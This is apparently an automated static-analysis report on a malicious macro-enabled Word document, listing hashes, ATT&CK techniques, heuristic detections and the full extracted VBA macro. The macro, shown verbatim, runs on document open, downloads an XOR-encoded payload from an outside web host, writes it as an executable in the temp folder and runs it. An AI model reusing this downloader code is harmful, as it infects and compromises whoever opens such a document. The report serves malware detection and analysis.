Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 85fe424b0f878183…

MALICIOUS

Office (OOXML)

23.4 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-11-28
MD5: fac8151df14ad819bc47dbab69f07488 SHA-1: d56565ea801147302d452f9278d37f407c4fcaa4 SHA-256: 85fe424b0f878183d55e84d1c34e9d15e08586df7a11c30085a3f55a3894da18
266 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The file is an Office document containing VBA macros, indicated by multiple heuristic firings including OLE_VBA_AUTOOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The VBA script, although partially truncated, contains obfuscated code and calls to CreateObject, suggesting it is designed to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature as a downloader.

Heuristics 9

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set RCHEXULuYTT = CreateObject(UCkyDnBcOJ)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3334 bytes
SHA-256: 20953d4f4cd6e99563a3fb7f4b6ec61736baffaa75d9be46c2038e7eb4b5f7fe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
QTtZYI
End Sub

Function IyoOQOnrppQFioj(gCEeWzI, DqwEwdTbn)
Dim zlareJMwgXuU
zlareJMwgXuU = ""
Dim AJRBYVpXLVoScg
AJRBYVpXLVoScg = (&H3EF + 2892 - &HF3A)
Dim UbPZhinXYmDyHfg
UbPZhinXYmDyHfg = (&H3EF + 2892 - &HF3A)
For UbPZhinXYmDyHfg = 1 To Len(gCEeWzI)
zlareJMwgXuU = zlareJMwgXuU & Chr(Asc(Mid(gCEeWzI, UbPZhinXYmDyHfg, 1)) Xor Asc(Mid(DqwEwdTbn, AJRBYVpXLVoScg, 1)))
AJRBYVpXLVoScg = AJRBYVpXLVoScg + (&H3EF + 2892 - &HF3A)
If Len(DqwEwdTbn) < AJRBYVpXLVoScg Then AJRBYVpXLVoScg = 1
Next

IyoOQOnrppQFioj = zlareJMwgXuU
End Function

Function cVKiTjzFpqY(dQPisRnWQ)
Dim TqnNJHOmeaW, bjHULvrxsGqSh, FpyTjuQvppMsrz, aWXRJktgqwB, IgOvjUaMgbEvK, OSmtsQRv
Dim TFfqVTeocOMYI
TqnNJHOmeaW = 1
bjHULvrxsGqSh = (&H3EF + 2892 - &HF3A)
FpyTjuQvppMsrz = (&H3EF + 2892 - &HF3A)
TFfqVTeocOMYI = LenB(dQPisRnWQ)
Do While TqnNJHOmeaW <= TFfqVTeocOMYI
OSmtsQRv = OSmtsQRv & Chr(AscB(MidB(dQPisRnWQ, TqnNJHOmeaW, 1)))
TqnNJHOmeaW = TqnNJHOmeaW + 1
FpyTjuQvppMsrz = FpyTjuQvppMsrz + 1
If FpyTjuQvppMsrz > 300 Then
IgOvjUaMgbEvK = IgOvjUaMgbEvK & OSmtsQRv
OSmtsQRv = ""
FpyTjuQvppMsrz = (&H3EF + 2892 - &HF3A)
bjHULvrxsGqSh = bjHULvrxsGqSh + 1
If bjHULvrxsGqSh > 40 * (&H20 + 1142 - &H491) Then
aWXRJktgqwB = aWXRJktgqwB & IgOvjUaMgbEvK
IgOvjUaMgbEvK = ""
bjHULvrxsGqSh = 1
End If
End If
Loop
cVKiTjzFpqY = aWXRJktgqwB & IgOvjUaMgbEvK & OSmtsQRv
End Function

Sub QTtZYI()
Dim MtAyEEjNLcsCws As String
pgANzsJocsfWhfj = ""
mHvKSvHfsMvNDF = "crip"
HsSsJyH = pgANzsJocsfWhfj + pgANzsJocsfWhfj + "WS" + pgANzsJocsfWhfj + mHvKSvHfsMvNDF + "t.S" + "hell" + pgANzsJocsfWhfj
zyxRDUI = ".exe"
dbmIXwjoH = "diskdfrg546" & zyxRDUI
ghfdqphdP = "Scripting" + "." + "F" + "ile" + "S" + "y" + "s"
MGIPpTTngrjc = "e" + "c" + "t"
UCkyDnBcOJ = ghfdqphdP + "temObj" + MGIPpTTngrjc
Set RCHEXULuYTT = CreateObject(UCkyDnBcOJ)
FpEuhu = RCHEXULuYTT.GetSpecialFolder(2) & "\" + "\"
bLMZoXPAyorru = FpEuhu & dbmIXwjoH
MtAyEEjNLcsCws = (&H20 + 1142 - 1169)
jmxMikkqclnUCWu = ".1"
MovAiApHGJOGs = "WinH" + "ttp.Wi" + "nHttpReq" + "ue" + "st" + "." + MtAyEEjNLcsCws + jmxMikkqclnUCWu
Set LQOekzmbkKTE = CreateObject(MovAiApHGJOGs, "")
zlareJMwgXuU = "http:" + "//hardwerkendemo" + "eder" + "s.nl/wp-content/uploads/" + "file" + ".e" + "m" + "l"
iMvxjfpl = "GE" + "T"
LQOekzmbkKTE.Open iMvxjfpl, zlareJMwgXuU, False
LQOekzmbkKTE.send
If RCHEXULuYTT.FileExists(bLMZoXPAyorru) Then
RCHEXULuYTT.DeleteFile (bLMZoXPAyorru)
End If
If LQOekzmbkKTE.Status = 100 + 100 Then
EIBKdZsWtph = True
Set vZXmsTUYY = RCHEXULuYTT.CreateTextFile(bLMZoXPAyorru, EIBKdZsWtph)
ebVjXrJdi = LQOekzmbkKTE.responseBody
vZXmsTUYY.Write IyoOQOnrppQFioj(cVKiTjzFpqY(ebVjXrJdi), "nkiOa" + "W" + "s" + "g")
vZXmsTUYY.Close
End If
    
If RCHEXULuYTT.FileExists(bLMZoXPAyorru) Then
QmTKEIgFqUaxkYp = bLMZoXPAyorru
CreateObject(HsSsJyH).Run QmTKEIgFqUaxkYp
End If
End Sub

Sub AutoOpen()
GoISsHbHtyMpP = "Toda" + "y O" + "ba" + "ma" + " N" + "uk" + "e"
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14336 bytes
SHA-256: dd2578c3e25be4fd571abf6c40df1b031e2a4f120c5fe165e5cf4e4cc00e046e
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.